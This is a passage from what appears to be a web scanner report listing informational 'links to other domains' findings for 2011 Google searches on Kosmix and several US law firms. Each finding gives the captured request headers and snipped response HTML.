<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=XX4340" class=l onmousedown="return clk(this.href,'','','','12','','0CHYQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:aOrOfpnN068J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX4340+Benesch+Friedlander+Coplan+%26+Aronoff&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:aOrOfpnN068J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX4340+Benesch+Friedlander+Coplan+%26+Aronoff&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','12','','0CHsQIDAL')">Cached</a>
...[SNIP]...
<div><a href="http://www.calfee.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CH4QoggwDA')">Calfee.com</a>
...[SNIP]...
<div><a href="http://www.bricker.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIABEKIIMA0')">of the Bricker</a>
...[SNIP]...
<div><a href="http://www.hahnlaw.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIIBEKIIMA4')">Hahn Loeser</a>
...[SNIP]...
<div><a href="http://www.taftlaw.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIQBEKIIMA8')">Taft, Stettinius & Hollister, LLP</a>
...[SNIP]...

19.52. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Kosmix&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://autos.kosmix.com/
http://blog.kosmix.com/
http://blogs.wsj.com/venturecapital/2011/04/20/wal-marts-kosmix-deal-may-inspire-other-retailers/
http://dealbook.nytimes.com/2011/04/19/wal-mart-buys-social-media-site-kosmix/
http://duckduckgo.com/
http://en.wikipedia.org/wiki/Kosmix
http://homegarden.kosmix.com/
http://sports.kosmix.com/
http://travel.kosmix.com/
http://twitter.com/kosmix
http://webcache.googleusercontent.com/search?q=cache:5XrQR0LcH4UJ:www.kosmix.com/+Kosmix&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:62KpRUSLeRQJ:en.wikipedia.org/wiki/Kosmix+Kosmix&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:7wKfXIzgtEsJ:dealbook.nytimes.com/2011/04/19/wal-mart-buys-social-media-site-kosmix/+Kosmix&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:EE0UVfccbTUJ:www.huffingtonpost.com/2011/04/18/walmart-social-media-kosmix_n_850678.html+Kosmix&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZNeyDfQVYRoJ:blogs.wsj.com/venturecapital/2011/04/20/wal-marts-kosmix-deal-may-inspire-other-retailers/+Kosmix&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:c4rCe42kN5UJ:autos.kosmix.com/+Kosmix&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:irDc3LnbleoJ:www.crunchbase.com/company/kosmix+Kosmix&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:sA4frT-hIOwJ:blog.kosmix.com/+Kosmix&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:tX5nSTBW2XUJ:twitter.com/kosmix+Kosmix&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.crunchbase.com/company/kosmix
http://www.factbites.com/
http://www.hakia.com/
http://www.huffingtonpost.com/2011/04/18/walmart-social-media-kosmix_n_850678.html
http://www.kosmix.com/
http://www.kosmix.com/browse
http://www.kosmix.com/corp/about
http://www.kosmix.com/corp/contact
http://www.kosmix.com/corp/jobs
http://www.kosmix.com/corp/team
http://www.lexxe.com/
http://www.nytimes.com/2009/03/15/business/15ping.html
http://www.youtube.com/results?q=Kosmix&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Kosmix&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:34 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76432

<!doctype html> <head> <title>Kosmix - Google Search</title> <script>window.google={kEI:"YsTLTaaXOcfJgQe-9_zrBQ",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29757,29795,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Kosmix&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kosmix.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5XrQR0LcH4UJ:www.kosmix.com/+Kosmix&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CC8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/corp/about" onmousedown="return clk(this.href,'','','','1','','0CDEQqwMoADAA')">Kosmix's about page</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/corp/team" onmousedown="return clk(this.href,'','','','1','','0CDIQqwMoATAA')">Our Team</a></div><div class=sld><a class=sla href="http://www.kosmix.com/corp/jobs" onmousedown="return clk(this.href,'','','','1','','0CDMQqwMoAjAA')">Jobs</a></div><div class=sld><a class=sla href="http://sports.kosmix.com/" onmousedown="return clk(this.href,'','','','1','','0CDQQqwMoAzAA')">Sports</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/corp/contact" onmousedown="return clk(this.href,'','','','1','','0CDUQqwMoBDAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://travel.kosmix.com/" onmousedown="return clk(this.href,'','','','1','','0CDYQqwMoBTAA')">Travel</a></div><div class=sld><a class=sla href="http://homegarden.kosmix.com/" onmousedown="return clk(this.href,'','','','1','','0CDcQqwMoBjAA')">Home & Garden</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/browse" onmousedown="return clk(this.href,'','','','1','','0CDgQqwMoBzAA')">Browse Topics</a>
...[SNIP]...
<h3 class="r"><a href="http://blog.kosmix.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CDsQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sA4frT-hIOwJ:blog.kosmix.com/+Kosmix&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEAQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://autos.kosmix.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CEIQFjAC')">Autos on <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:c4rCe42kN5UJ:autos.kosmix.com/+Kosmix&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CEcQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Kosmix" class=l onmousedown="return clk(this.href,'','','','4','','0CEoQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:62KpRUSLeRQJ:en.wikipedia.org/wiki/Kosmix+Kosmix&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CE8QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/kosmix" class=l onmousedown="return clk(this.href,'','','','5','','0CFEQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:irDc3LnbleoJ:www.crunchbase.com/company/kosmix+Kosmix&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CFgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://dealbook.nytimes.com/2011/04/19/wal-mart-buys-social-media-site-kosmix/" class=l onmousedown="return clk(this.href,'','','','6','','0CFoQFjAF')">Wal-Mart Buys Social Media Site <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7wKfXIzgtEsJ:dealbook.nytimes.com/2011/04/19/wal-mart-buys-social-media-site-kosmix/+Kosmix&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CF8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nytimes.com/2009/03/15/business/15ping.html" class=l onmousedown="return clk(this.href,'','','','7','','0CGAQFjAG')">Ping - Just Don't Compare <em>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/kosmix" class=l onmousedown="return clk(this.href,'','','','8','','0CGgQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tX5nSTBW2XUJ:twitter.com/kosmix+Kosmix&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CG0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://blogs.wsj.com/venturecapital/2011/04/20/wal-marts-kosmix-deal-may-inspire-other-retailers/" class=l onmousedown="return clk(this.href,'','','','9','','0CG8QFjAI')">Will Wal-Mart's <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZNeyDfQVYRoJ:blogs.wsj.com/venturecapital/2011/04/20/wal-marts-kosmix-deal-may-inspire-other-retailers/+Kosmix&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CHQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.huffingtonpost.com/2011/04/18/walmart-social-media-kosmix_n_850678.html" class=l onmousedown="return clk(this.href,'','','','10','','0CHUQFjAJ')">Walmart To Buy Social Media Firm <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EE0UVfccbTUJ:www.huffingtonpost.com/2011/04/18/walmart-social-media-kosmix_n_850678.html+Kosmix&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHoQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://duckduckgo.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHwQoggwCg')">new search engine</a>
...[SNIP]...
<div><a href="http://www.hakia.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CH4QoggwCw')">Hakia</a>
...[SNIP]...
<div><a href="http://www.lexxe.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CIABEKIIMAw')">Lexxe</a>
...[SNIP]...
<div><a href="http://www.factbites.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIIBEKIIMA0')">Factbites</a>
...[SNIP]...

19.53. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Hamilton+Brook+Smith+%26+Reynolds&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://boston.monster.com/Search.aspx?sid=40&cy=US&cnme=Concord%2C+MA&q=%22Hamilton%2C+Brook%2C+Smith+%26+Reynolds%22
http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=7245327
http://webcache.googleusercontent.com/search?q=cache:1lrSolJe4NkJ:www.hbsr.com/directory/search+Hamilton+Brook+Smith+%26+Reynolds&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:DNR67kwzd0AJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D7245327+Hamilton+Brook+Smith+%26+Reynolds&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:HezKGJqTXmcJ:www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm+Hamilton+Brook+Smith+%26+Reynolds&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Ih3XUfLqV68J:www.hbsr.com/careers/why-hamilton-brook-smith-reynolds+Hamilton+Brook+Smith+%26+Reynolds&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:K7i_w52GJZUJ:www.hbsr.com/contact_us/index+Hamilton+Brook+Smith+%26+Reynolds&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:WK3DLFO3BKEJ:www.linkedin.com/company/hamilton-brook-smith-%26-reynolds-p.c.+Hamilton+Brook+Smith+%26+Reynolds&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:YgtFQJmUOvQJ:www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html+Hamilton+Brook+Smith+%26+Reynolds&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:n1SRhuyuN9kJ:www.hbsr.com/+Hamilton+Brook+Smith+%26+Reynolds&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:vJxpJeEbg2oJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX3940+Hamilton+Brook+Smith+%26+Reynolds&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.altmartlaw.com/
http://www.foleyhoag.com/
http://www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm
http://www.hbsr.com/
http://www.hbsr.com/about_the_firm/firm-overview
http://www.hbsr.com/careers/why-hamilton-brook-smith-reynolds
http://www.hbsr.com/contact_us/index
http://www.hbsr.com/directory/search
http://www.iandiorio.com/
http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=XX3940
http://www.linkedin.com/company/hamilton-brook-smith-&-reynolds-p.c.
http://www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html
http://www.wolfgreenfield.com/
http://www.youtube.com/results?q=Hamilton+Brook+Smith+%26+Reynolds&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Hamilton+Brook+Smith+%26+Reynolds&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 72599

<!doctype html> <head> <title>Hamilton Brook Smith & Reynolds - Google Search</title> <script>window.google={kEI:"j9DLTa2zLITy0gHFrJjeBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Hamilton+Brook+Smith+%26+Reynolds&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:n1SRhuyuN9kJ:www.hbsr.com/+Hamilton+Brook+Smith+%26+Reynolds&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:n1SRhuyuN9kJ:www.hbsr.com/+Hamilton+Brook+Smith+%26+Reynolds&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hbsr.com/directory/search" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Directory</a></div><div class=sld><a class=sla href="http://www.hbsr.com/careers/why-hamilton-brook-smith-reynolds" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hbsr.com/contact_us/index" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hbsr.com/about_the_firm/firm-overview" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">About The Firm</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/contact_us/index" class=l onmousedown="return clk(this.href,'','','','2','','0CCMQFjAB')">Massachusetts Intellectual Property Law Firm</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:K7i_w52GJZUJ:www.hbsr.com/contact_us/index+Hamilton+Brook+Smith+%26+Reynolds&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:K7i_w52GJZUJ:www.hbsr.com/contact_us/index+Hamilton+Brook+Smith+%26+Reynolds&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/careers/why-hamilton-brook-smith-reynolds" class=l onmousedown="return clk(this.href,'','','','3','','0CCoQFjAC')">Boston IP Law Firm Careers, Firm Culture</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ih3XUfLqV68J:www.hbsr.com/careers/why-hamilton-brook-smith-reynolds+Hamilton+Brook+Smith+%26+Reynolds&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ih3XUfLqV68J:www.hbsr.com/careers/why-hamilton-brook-smith-reynolds+Hamilton+Brook+Smith+%26+Reynolds&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/directory/search" class=l onmousedown="return clk(this.href,'','','','4','','0CDEQFjAD')">Directory Search</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1lrSolJe4NkJ:www.hbsr.com/directory/search+Hamilton+Brook+Smith+%26+Reynolds&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:1lrSolJe4NkJ:www.hbsr.com/directory/search+Hamilton+Brook+Smith+%26+Reynolds&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDYQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://boston.monster.com/Search.aspx?sid=40&cy=US&cnme=Concord%2C+MA&q=%22Hamilton%2C+Brook%2C+Smith+%26+Reynolds%22" class=l onmousedown="return clk('http://boston.monster.com/Search.aspx?sid=40&cy=US&cnme=Concord%2C+MA&q=%22Hamilton%2C+Brook%2C+Smith+%26+Reynolds%22','','','','5','','0CDkQFjAE')">"<em>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=7245327" class=l onmousedown="return clk(this.href,'','','','6','','0CD4QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DNR67kwzd0AJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D7245327+Hamilton+Brook+Smith+%26+Reynolds&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DNR67kwzd0AJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D7245327+Hamilton+Brook+Smith+%26+Reynolds&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CEQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HezKGJqTXmcJ:www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm+Hamilton+Brook+Smith+%26+Reynolds&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HezKGJqTXmcJ:www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm+Hamilton+Brook+Smith+%26+Reynolds&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=XX3940" class=l onmousedown="return clk(this.href,'','','','8','','0CEoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vJxpJeEbg2oJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX3940+Hamilton+Brook+Smith+%26+Reynolds&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:vJxpJeEbg2oJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX3940+Hamilton+Brook+Smith+%26+Reynolds&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CE8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFEQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:YgtFQJmUOvQJ:www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html+Hamilton+Brook+Smith+%26+Reynolds&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:YgtFQJmUOvQJ:www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html+Hamilton+Brook+Smith+%26+Reynolds&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/hamilton-brook-smith-&-reynolds-p.c." class=l onmousedown="return clk(this.href,'','','','10','','0CFcQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WK3DLFO3BKEJ:www.linkedin.com/company/hamilton-brook-smith-%26-reynolds-p.c.+Hamilton+Brook+Smith+%26+Reynolds&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:WK3DLFO3BKEJ:www.linkedin.com/company/hamilton-brook-smith-%26-reynolds-p.c.+Hamilton+Brook+Smith+%26+Reynolds&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CFwQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.foleyhoag.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CF8QoggwCg')">Foley Hoag LLP</a>
...[SNIP]...
<div><a href="http://www.iandiorio.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGEQoggwCw')">Iandiorio & Teska</a>
...[SNIP]...
<div><a href="http://www.wolfgreenfield.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGMQoggwDA')">Wolf Greenfield</a>
...[SNIP]...
<div><a href="http://www.altmartlaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGUQoggwDQ')">Patent Law Massachusetts Attorney</a>
...[SNIP]...

19.54. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Butler+Rubin+Saltarelli+%26+Boyd&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html
http://webcache.googleusercontent.com/search?q=cache:2y_4oDCDL_EJ:www.butlerrubin.com/web/br.nsf/executivestaff+Butler+Rubin+Saltarelli+%26+Boyd&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:CqE60lfUb_UJ:www.butlerrubin.com/web/br.nsf/business_reorganization+Butler+Rubin+Saltarelli+%26+Boyd&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Gl6Zr6yLZycJ:www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/+Butler+Rubin+Saltarelli+%26+Boyd&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:GznoZtMVhZ4J:www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:SLJnUHXWGcUJ:chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Ul5mXwUPl3UJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DIL0180+Butler+Rubin+Saltarelli+%26+Boyd&cd=13&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
